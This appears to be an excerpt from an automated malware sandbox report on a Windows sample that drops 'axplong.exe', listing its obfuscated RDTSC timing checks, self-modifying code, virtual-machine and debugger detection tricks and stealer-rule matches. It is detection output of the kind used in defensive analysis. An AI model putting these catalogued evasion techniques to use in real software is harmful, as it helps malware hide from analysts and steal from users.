                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 4B6001C second address: 4B60084 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a mov cx, bx 0x0000000d mov cx, bx 0x00000010 popad 0x00000011 xchg eax, ebp 0x00000012 pushad 0x00000013 mov dl, C2h 0x00000015 pushfd 0x00000016 jmp 00007F3A94CD407Eh 0x0000001b add al, 00000028h 0x0000001e jmp 00007F3A94CD407Bh 0x00000023 popfd 0x00000024 popad 0x00000025 mov ebp, esp 0x00000027 jmp 00007F3A94CD4086h 0x0000002c and esp, FFFFFFF8h 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007F3A94CD4087h 0x00000036 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 4B60084 second address: 4B600F7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A9502B5F9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F3A9502B5F3h 0x00000013 adc ch, FFFFFFDEh 0x00000016 jmp 00007F3A9502B5F9h 0x0000001b popfd 0x0000001c pushfd 0x0000001d jmp 00007F3A9502B5F0h 0x00000022 xor ah, FFFFFFD8h 0x00000025 jmp 00007F3A9502B5EBh 0x0000002a popfd 0x0000002b popad 0x0000002c rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 4B600F7 second address: 4B600FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 4B600FD second address: 4B60101 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 4B60101 second address: 4B6013C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A94CD407Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F3A94CD4089h 0x00000011 xchg eax, ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F3A94CD407Dh 0x00000019 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 4B6013C second address: 4B60158 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A9502B5F1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 4B60158 second address: 4B6015C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 4B6015C second address: 4B6016F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A9502B5EFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 4B6016F second address: 4B60187 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3A94CD4084h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 4B60187 second address: 4B6018B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 4B6018B second address: 4B601B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F3A94CD407Eh 0x0000000e xchg eax, ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F3A94CD407Ah 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 4B601B1 second address: 4B601B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 4B601B7 second address: 4B601BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 4B601BD second address: 4B601C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 4B601C1 second address: 4B601E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebx, dword ptr [ebp+10h] 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov eax, edx 0x00000010 call 00007F3A94CD407Dh 0x00000015 pop eax 0x00000016 popad 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 4B601E0 second address: 4B60246 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F3A9502B5ECh 0x00000008 mov ecx, 643002E1h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 xchg eax, esi 0x00000011 jmp 00007F3A9502B5ECh 0x00000016 push eax 0x00000017 pushad 0x00000018 movsx edx, ax 0x0000001b popad 0x0000001c xchg eax, esi 0x0000001d jmp 00007F3A9502B5EFh 0x00000022 mov esi, dword ptr [ebp+08h] 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 pushfd 0x00000029 jmp 00007F3A9502B5EEh 0x0000002e jmp 00007F3A9502B5F5h 0x00000033 popfd 0x00000034 popad 0x00000035 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 4B60246 second address: 4B60263 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F3A94CD4087h 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 4B60263 second address: 4B60286 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push ecx 0x00000008 jmp 00007F3A9502B5F2h 0x0000000d mov dword ptr [esp], edi 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 4B60286 second address: 4B6028C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 4B603A4 second address: 4B603F3 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, 2ECFB96Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a mov dh, ah 0x0000000c pushfd 0x0000000d jmp 00007F3A9502B5F7h 0x00000012 and cx, 71AEh 0x00000017 jmp 00007F3A9502B5F9h 0x0000001c popfd 0x0000001d popad 0x0000001e popad 0x0000001f test byte ptr [esi+48h], 00000001h 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 popad 0x00000029 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 4B603F3 second address: 4B603F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 4B603F9 second address: 4B603FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 4B50716 second address: 4B5071C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 4B5071C second address: 4B50720 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 4B50720 second address: 4B50787 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A94CD4083h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d movzx esi, di 0x00000010 mov dh, 1Ah 0x00000012 popad 0x00000013 push eax 0x00000014 jmp 00007F3A94CD4083h 0x00000019 xchg eax, ebp 0x0000001a jmp 00007F3A94CD4086h 0x0000001f mov ebp, esp 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F3A94CD4087h 0x00000028 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 4B50787 second address: 4B507CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop eax 0x00000005 mov bx, 5E46h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c and esp, FFFFFFF8h 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushfd 0x00000013 jmp 00007F3A9502B5F9h 0x00000018 xor si, 77A6h 0x0000001d jmp 00007F3A9502B5F1h 0x00000022 popfd 0x00000023 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 4B507CA second address: 4B50823 instructions: 0x00000000 rdtsc 0x00000002 mov edx, eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007F3A94CD407Ch 0x0000000c add eax, 1F97B548h 0x00000012 jmp 00007F3A94CD407Bh 0x00000017 popfd 0x00000018 popad 0x00000019 xchg eax, ebx 0x0000001a pushad 0x0000001b pushfd 0x0000001c jmp 00007F3A94CD4084h 0x00000021 adc cx, 77A8h 0x00000026 jmp 00007F3A94CD407Bh 0x0000002b popfd 0x0000002c movzx eax, bx 0x0000002f popad 0x00000030 push eax 0x00000031 push eax 0x00000032 push edx 0x00000033 push eax 0x00000034 push edx 0x00000035 push eax 0x00000036 push edx 0x00000037 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 4B50823 second address: 4B50827 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 4B50827 second address: 4B5082D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 4B5082D second address: 4B50873 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, 29D453ABh 0x00000008 pushfd 0x00000009 jmp 00007F3A9502B5F0h 0x0000000e sub eax, 59ADE538h 0x00000014 jmp 00007F3A9502B5EBh 0x00000019 popfd 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d xchg eax, ebx 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F3A9502B5F5h 0x00000025 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 4B50873 second address: 4B50883 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3A94CD407Ch 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 4B50883 second address: 4B50892 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 4B50892 second address: 4B50896 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 4B50896 second address: 4B5089A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 4B5089A second address: 4B508A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 4B508A0 second address: 4B5094D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A9502B5F0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], esi 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F3A9502B5EEh 0x00000013 xor si, 6458h 0x00000018 jmp 00007F3A9502B5EBh 0x0000001d popfd 0x0000001e pushfd 0x0000001f jmp 00007F3A9502B5F8h 0x00000024 sub ax, EEB8h 0x00000029 jmp 00007F3A9502B5EBh 0x0000002e popfd 0x0000002f popad 0x00000030 mov esi, dword ptr [ebp+08h] 0x00000033 pushad 0x00000034 mov al, 23h 0x00000036 jmp 00007F3A9502B5F1h 0x0000003b popad 0x0000003c sub ebx, ebx 0x0000003e jmp 00007F3A9502B5F7h 0x00000043 test esi, esi 0x00000045 push eax 0x00000046 push edx 0x00000047 jmp 00007F3A9502B5F5h 0x0000004c rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 4B5094D second address: 4B509DD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov ecx, edx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a je 00007F3B07529AADh 0x00000010 pushad 0x00000011 push edi 0x00000012 call 00007F3A94CD4080h 0x00000017 pop eax 0x00000018 pop ebx 0x00000019 mov dx, ax 0x0000001c popad 0x0000001d cmp dword ptr [esi+08h], DDEEDDEEh 0x00000024 pushad 0x00000025 mov edi, ecx 0x00000027 pushad 0x00000028 pushfd 0x00000029 jmp 00007F3A94CD4082h 0x0000002e add ecx, 16C2DF68h 0x00000034 jmp 00007F3A94CD407Bh 0x00000039 popfd 0x0000003a jmp 00007F3A94CD4088h 0x0000003f popad 0x00000040 popad 0x00000041 mov ecx, esi 0x00000043 pushad 0x00000044 mov esi, 1B78B39Dh 0x00000049 mov edx, eax 0x0000004b popad 0x0000004c je 00007F3B07529A4Fh 0x00000052 push eax 0x00000053 push edx 0x00000054 jmp 00007F3A94CD407Bh 0x00000059 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 4B509DD second address: 4B509E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 4B509E4 second address: 4B50A00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 test byte ptr [77436968h], 00000002h 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F3A94CD407Ch 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 4B50A00 second address: 4B50A1B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A9502B5EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007F3B07880F8Dh 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeSpecial instruction interceptor: First address: 1CEA2E instructions caused by: Self-modifying code
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeSpecial instruction interceptor: First address: 378365 instructions caused by: Self-modifying code
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeSpecial instruction interceptor: First address: 1CEA22 instructions caused by: Self-modifying code
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeSpecial instruction interceptor: First address: 3F7884 instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSpecial instruction interceptor: First address: C4EA2E instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSpecial instruction interceptor: First address: DF8365 instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSpecial instruction interceptor: First address: C4EA22 instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSpecial instruction interceptor: First address: E77884 instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeCode function: 1_2_04BD02BD rdtsc 1_2_04BD02BD
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeThread delayed: delay time: 180000Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow / User API: threadDelayed 445Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow / User API: threadDelayed 2811Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow / User API: threadDelayed 2914Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow / User API: threadDelayed 966Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow / User API: threadDelayed 601Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5780Thread sleep count: 64 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5780Thread sleep time: -128064s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5804Thread sleep count: 53 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5804Thread sleep time: -106053s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 6656Thread sleep count: 445 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 6656Thread sleep time: -13350000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 6992Thread sleep time: -720000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 4368Thread sleep count: 52 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 4368Thread sleep time: -104052s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 4460Thread sleep count: 2811 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 4460Thread sleep time: -5624811s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5356Thread sleep count: 2914 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5356Thread sleep time: -5830914s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5356Thread sleep count: 966 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5356Thread sleep time: -1932966s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 4460Thread sleep count: 601 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 4460Thread sleep time: -1202601s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeThread delayed: delay time: 30000Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeThread delayed: delay time: 180000Jump to behavior
                    Source: axplong.exe, axplong.exe, 00000009.00000002.3362669493.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                    Source: axplong.exe, 00000009.00000002.3364157249.000000000129B000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000009.00000002.3364157249.000000000127E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: 9ICG2PuZbG.exe, 00000001.00000002.2156468731.000000000034E000.00000040.00000001.01000000.00000003.sdmp, axplong.exe, 00000002.00000002.2186759224.0000000000DCE000.00000040.00000001.01000000.00000007.sdmp, axplong.exe, 00000003.00000002.2186680442.0000000000DCE000.00000040.00000001.01000000.00000007.sdmp, axplong.exe, 00000009.00000002.3362669493.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                    Source: axplong.exe, 00000009.00000002.3364157249.0000000001268000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@C)
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeSystem information queried: ModuleInformationJump to behavior
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeProcess information queried: ProcessInformationJump to behavior

                    Anti Debugging

                    barindex
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeThread information set: HideFromDebuggerJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeThread information set: HideFromDebuggerJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeThread information set: HideFromDebuggerJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeThread information set: HideFromDebuggerJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: regmonclass
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: gbdyllo
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: procmon_window_class
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: ollydbg
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: filemonclass
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: NTICE
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: SICE
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: SIWVID
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeCode function: 1_2_04BD02BD rdtsc 1_2_04BD02BD
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 9_2_00C1645B mov eax, dword ptr fs:[00000030h]9_2_00C1645B
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 9_2_00C1A1C2 mov eax, dword ptr fs:[00000030h]9_2_00C1A1C2
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeProcess created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe" Jump to behavior
                    Source: axplong.exe, axplong.exe, 00000009.00000002.3362669493.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: ,cDProgram Manager
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 9_2_00BFD312 cpuid 9_2_00BFD312
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeQueries volume information: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 9_2_00BFCB1A GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,9_2_00BFCB1A
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 9_2_00BE65B0 LookupAccountNameA,9_2_00BE65B0

                    Stealing of Sensitive Information

                    barindex
                    Source: Yara matchFile source: 1.2.9ICG2PuZbG.exe.160000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.axplong.exe.be0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.axplong.exe.be0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.axplong.exe.be0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000001.00000002.2156374942.0000000000161000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.3362421453.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000003.2116109167.00000000049E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000003.2723052390.0000000004D60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.2186588517.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
